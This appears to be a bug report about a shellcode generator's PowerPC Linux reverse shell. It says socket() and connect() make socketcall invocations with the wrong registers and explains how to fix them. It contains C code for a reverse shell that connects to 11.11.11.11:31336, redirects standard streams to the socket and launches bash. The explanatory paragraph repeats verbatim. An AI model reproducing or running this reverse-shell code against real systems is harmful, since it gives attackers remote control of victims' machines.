Generating powerpc shellcode for a reverse shell on linux does not do socketcalls properly. r4 should point to the beginning of the arguments in memory (usually on the stack, libc puts them at r1+0x14). r0 should have 0x66 and r3 should have the socketcall number. In the following code snippet, both socket() and connect() are called improperly in the generated shellcode. Once those are fixed up properly, the rest of it runs fine.
void main()
{
int s = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(31336);
addr.sin_addr.s_addr = 0x0b0b0b0b;
connect(s, (struct sockaddr*)&addr, sizeof(addr));
dup2(s, 0);
dup2(s, 1);
dup2(s, 2);
bash();
}
Generating powerpc shellcode for a reverse shell on linux does not do socketcalls properly. r4 should point to the beginning of the arguments in memory (usually on the stack, libc puts them at r1+0x14). r0 should have 0x66 and r3 should have the socketcall number. In the following code snippet, both socket() and connect() are called improperly in the generated shellcode. Once those are fixed up properly, the rest of it runs fine.